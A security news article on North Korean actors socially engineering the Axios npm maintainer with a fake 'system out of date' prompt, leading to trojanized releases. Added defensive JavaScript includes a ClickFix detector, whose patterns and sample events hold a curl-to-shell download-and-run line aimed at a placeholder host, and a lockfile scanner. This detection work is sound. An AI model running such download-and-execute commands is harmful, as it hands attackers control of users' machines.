UNC1069 Social Engineering of Axios Maintainer Led to npm Supply Chain Attack
North Korean Threat Actors Target Axios Maintainer in Sophisticated npm Supply Chain Attack
TL;DR: North Korean threat actors (UNC1069) executed a highly targeted social engineering campaign against the maintainer of the Axios npm package. By impersonating company executives and using fake technical hurdles during video calls, they deployed a Remote Access Trojan (RAT) to steal credentials and publish trojanized versions of Axios (1.14.1 and 0.30.4).
The Social Engineering of Jason Saayman
The maintainer of the Axios npm package, Jason Saayman, recently confirmed that a compromise of the widely used library was the result of an intricate social engineering campaign. Attributed to the North Korean threat group tracked as UNC1069 (also associated with BlueNoroff and "GhostCall"), the attack was tailored specifically to Saayman.
The actors initiated contact by posing as the founder of a legitimate, well-known company. To build rapport and establish a sense of legitimacy, the attackers:
- Cloned Likenesses: Used the identities and appearances of real company founders.
- Fabricated Environments: Invited Saayman to a professional-looking Slack workspace branded with the company’s corporate identity, featuring channels populated with LinkedIn posts.
- Virtual Meetings: Scheduled a meeting via Microsoft Teams to discuss a purported business opportunity.
The "ClickFix" Infection Vector
The attack transitioned from social engineering to technical exploitation during the scheduled Microsoft Teams call. Upon joining, Saayman was presented with a fake error message claiming his system was out of date.
This tactic, documented by researchers at Huntress and Kaspersky, is a "ClickFix"-style pop-up: the victim is told the system is malfunctioning and instructed to download and run a so-called SDK to fix it. The "fix" is a malicious script selected for the victim's operating system:
- macOS: Executes AppleScript.
- Windows: Executes PowerShell.
In Saayman’s case, the update triggered the deployment of a Remote Access Trojan (RAT). This gave attackers the access needed to steal npm account credentials and bypass existing security measures to publish two malicious versions of Axios: 1.14.1 and 0.30.4.
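The lure above ends with a script interpreter (osascript or PowerShell) being launched from a browser or collaboration client, which is unusual enough to alert on. The following detection logic is an added example, not code from the article or from any vendor it names. The event schema (parent, image, cmdline), the list of "interactive" parent processes, the argument patterns and every sample event are constructed assumptions; tune them to your own telemetry.

```javascript
// Added example: flag ClickFix-style executions in process-creation telemetry.
// Event fields (ts, host, parent, image, cmdline) and all sample events below are
// constructed; they are not the format of any EDR named in the article.

// Parents that should not normally be launching script interpreters: browsers and
// collaboration clients, where the fake "your system is out of date" prompt is
// shown. Names are assumptions; extend the set for your fleet.
const INTERACTIVE_PARENTS = new Set([
  'msteams', 'teams', 'ms-teams', 'slack', 'chrome', 'google chrome',
  'msedge', 'firefox', 'safari', 'zoom',
]);

// The two interpreters the article says the lure drives, by platform.
const INTERPRETERS = [
  { name: 'osascript', re: /(^|[\\\/])osascript$/i },
  { name: 'powershell', re: /(^|[\\\/])(powershell|pwsh)(\.exe)?$/i },
];

// Command-line patterns typical of "paste this to fix it" payloads. `only` restricts
// a pattern to one interpreter so osascript's own -e flag is not mistaken for
// PowerShell's -EncodedCommand.
const SUSPICIOUS_ARGS = [
  { id: 'curl-pipe-shell', re: /\bcurl\b[^|]*\|\s*(sh|bash|zsh)\b/i },
  { id: 'applescript-shell', re: /do shell script/i, only: 'osascript' },
  { id: 'ps-encoded', re: /-(e|ec|enc|encodedcommand)\b/i, only: 'powershell' },
  { id: 'ps-download-exec', re: /\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b/i, only: 'powershell' },
  { id: 'ps-hidden-window', re: /-(w|windowstyle)\s+hidden\b/i, only: 'powershell' },
];

// Last path segment on either separator, lower-cased, without a trailing .exe.
function baseName(p) {
  return p.split(/[\\\/]/).pop().toLowerCase().replace(/\.exe$/, '');
}

// Returns { interpreter, reasons } when the event looks like a ClickFix execution,
// or null when the interpreter is doing ordinary work.
function classify(event) {
  const interp = INTERPRETERS.find(i => i.re.test(event.image));
  if (!interp) return null;

  const reasons = [];
  const parent = baseName(event.parent);
  if (INTERACTIVE_PARENTS.has(parent)) reasons.push(`spawned by ${parent}`);
  for (const p of SUSPICIOUS_ARGS) {
    if (p.only && p.only !== interp.name) continue;
    if (p.re.test(event.cmdline)) reasons.push(p.id);
  }
  return reasons.length ? { interpreter: interp.name, reasons } : null;
}

// Run classify() over a batch of events and keep only the hits.
function detect(events) {
  return events.flatMap(e => {
    const verdict = classify(e);
    return verdict ? [{ ts: e.ts, host: e.host, ...verdict }] : [];
  });
}

// Constructed sample events: two lure executions and two benign interpreter uses.
// The URL is a placeholder under the reserved .invalid TLD.
const SAMPLE_EVENTS = [
  { ts: '2026-01-01T10:00:00Z', host: 'mac-dev-01',
    parent: '/Applications/Microsoft Teams.app/Contents/MacOS/MSTeams',
    image: '/usr/bin/osascript',
    cmdline: `osascript -e 'do shell script "curl -fsSL https://sdk.example.invalid/fix.sh | sh"'` },
  { ts: '2026-01-01T10:05:00Z', host: 'win-dev-02',
    parent: 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe',
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    cmdline: 'powershell.exe -w hidden -EncodedCommand <base64 omitted>' },
  { ts: '2026-01-01T10:07:00Z', host: 'mac-dev-01',
    parent: '/bin/zsh',
    image: '/usr/bin/osascript',
    cmdline: `osascript -e 'display notification "build finished"'` },
  { ts: '2026-01-01T10:09:00Z', host: 'win-dev-02',
    parent: 'C:\\Windows\\explorer.exe',
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    cmdline: 'powershell.exe -NoProfile -Command Get-ChildItem' },
];

console.log(JSON.stringify(detect(SAMPLE_EVENTS), null, 2));
```

The parent-process check is the part worth keeping even if every argument pattern goes stale: a video-conferencing client or browser has no business spawning osascript or PowerShell, regardless of what the command line looks like.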
The Payload: WAVESHAPER and SilentSiphon
The malicious Axios packages contained an implant known as WAVESHAPER.V2. According to Mandiant and Kaspersky, this is part of a broader malware ecosystem used by North Korean actors:
- CosmicDoor: A Nim-based (macOS) or Go-based (Windows) backdoor used to deliver follow-up payloads.
- SilentSiphon: A comprehensive "stealer suite" designed to harvest credentials from web browsers, password managers, and developer-specific secrets (including GitHub, npm, Yarn, RubyGems, and AWS).
- WAVESHAPER: Serves as a conduit for a variety of other high-end malware, including HYPERCALL, SUGARLOADER, and DEEPBREATH.
A Coordinated Campaign Against the Node.js Ecosystem
Following the Axios incident, several other prominent maintainers revealed they had been targeted by the same group using nearly identical tactics. The campaign appears to be a coordinated effort to compromise high-impact open-source projects.
Targeted individuals included:
- Jordan Harband: Maintainer of ECMAScript polyfills.
- John-David Dalton: Creator of Lodash.
- Matteo Collina: Lead maintainer of Fastify, Pino, and Undici.
- Scott Motte: Creator of dotenv.
- Pelle Wessman: Maintainer of mocha and type-fest.
- Jean Burellier: Node.js core collaborator and Express contributor.
While Saayman was compromised, others evaded the attack. For instance, Pelle Wessman was invited to a fake podcast recording on a site mimicking StreamYard. When he declined to download the "fix" or paste a curl command into his terminal, the attackers immediately deleted the evidence and went dark.
Fallout and Defensive Measures
The compromise of Axios is particularly significant because of its reach: nearly 100 million weekly downloads. Because Axios is a dependency of many other libraries, a poisoned version can be pulled in transitively by projects that never list it directly, which is how it propagates through the JavaScript ecosystem.
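Because the trojanized versions can arrive as a nested copy under some other dependency, checking only your own package.json is not enough. The script below is an added example, not code from the article or the Axios project: it walks a package-lock.json (lockfileVersion 1 as well as 2/3) and reports every installed copy of a blocklisted version together with the dependency chain that pulled it in. The two lockfiles and the package names other than axios are constructed for the demonstration.

```javascript
// Added example: find every copy of a blocklisted package version in a
// package-lock.json, including copies nested under other dependencies.
// Both lockfiles below are constructed; "demo-http-wrapper" and "demo-tiny-util"
// are made-up package names.

// Versions the article names as trojanized.
const BLOCKLIST = { axios: new Set(['1.14.1', '0.30.4']) };

// Flatten a lockfile into [{ name, version, chain }], where chain lists the
// packages from the top-level dependency down to this particular copy.
function listInstalled(lock) {
  const out = [];
  if (lock.packages) {
    // lockfileVersion 2/3: flat map keyed by install path, e.g.
    // "node_modules/foo/node_modules/axios" is axios nested under foo.
    for (const [installPath, meta] of Object.entries(lock.packages)) {
      if (installPath === '') continue; // the root project itself
      const chain = installPath
        .split('node_modules/')
        .map(s => s.replace(/\/$/, ''))
        .filter(Boolean);
      out.push({ name: chain[chain.length - 1], version: meta.version, chain });
    }
  } else if (lock.dependencies) {
    // lockfileVersion 1: nested "dependencies" tree.
    const visit = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps)) {
        const chain = [...prefix, name];
        out.push({ name, version: meta.version, chain });
        if (meta.dependencies) visit(meta.dependencies, chain);
      }
    };
    visit(lock.dependencies, []);
  }
  return out;
}

// Installed copies whose exact version is on the blocklist.
function findCompromised(lock, blocklist = BLOCKLIST) {
  return listInstalled(lock).filter(
    p => blocklist[p.name] !== undefined && blocklist[p.name].has(p.version),
  );
}

// Print each hit with the chain that introduced it; returns the hit count.
function report(lock) {
  const hits = findCompromised(lock);
  for (const h of hits) {
    const via = h.chain.length > 1
      ? `via ${h.chain.slice(0, -1).join(' > ')}`
      : 'direct dependency';
    console.log(`${h.name}@${h.version} (${via})`);
  }
  return hits.length;
}

// Constructed lockfileVersion 3: one direct axios and one nested under a wrapper.
const SAMPLE_LOCK_V3 = {
  name: 'demo-app', lockfileVersion: 3, requires: true,
  packages: {
    '': { name: 'demo-app', dependencies: { axios: '^1.14.0', 'demo-http-wrapper': '^2.0.0' } },
    'node_modules/axios': { version: '1.14.1' },
    'node_modules/demo-http-wrapper': { version: '2.0.0', dependencies: { axios: '^0.30.0' } },
    'node_modules/demo-http-wrapper/node_modules/axios': { version: '0.30.4' },
    'node_modules/demo-tiny-util': { version: '3.1.0' },
  },
};

// Constructed lockfileVersion 1: same nested copy, older tree layout.
const SAMPLE_LOCK_V1 = {
  name: 'legacy-app', lockfileVersion: 1,
  dependencies: {
    'demo-http-wrapper': {
      version: '2.0.0',
      requires: { axios: '^0.30.0' },
      dependencies: { axios: { version: '0.30.4' } },
    },
    'demo-tiny-util': { version: '3.1.0' },
  },
};

console.log(`lockfile v3: ${report(SAMPLE_LOCK_V3)} compromised copies`);
console.log(`lockfile v1: ${report(SAMPLE_LOCK_V1)} compromised copies`);
```

To run it against a real project, replace the constructed object with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))`. Projects using yarn.lock or pnpm-lock.yaml need a different parser; the chain reconstruction is the same idea.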
In response to the attack, Saayman has outlined several restorative and preventative steps:
- Resetting all local devices and account credentials.
- Implementing immutable releases.
- Adopting OIDC (OpenID Connect) flows for package publishing.
- Updating GitHub Actions to follow security best practices.
However, security experts warn that if an attacker gains full control of a maintainer's machine via a RAT, defenses such as 2FA or OIDC-based publishing may not be enough on their own: from the compromised host, the threat actor can hijack authenticated browser sessions and reuse locally stored tokens.
Source: The Hacker News - UNC1069 Social Engineering of Axios Maintainer Led to npm Supply Chain Attack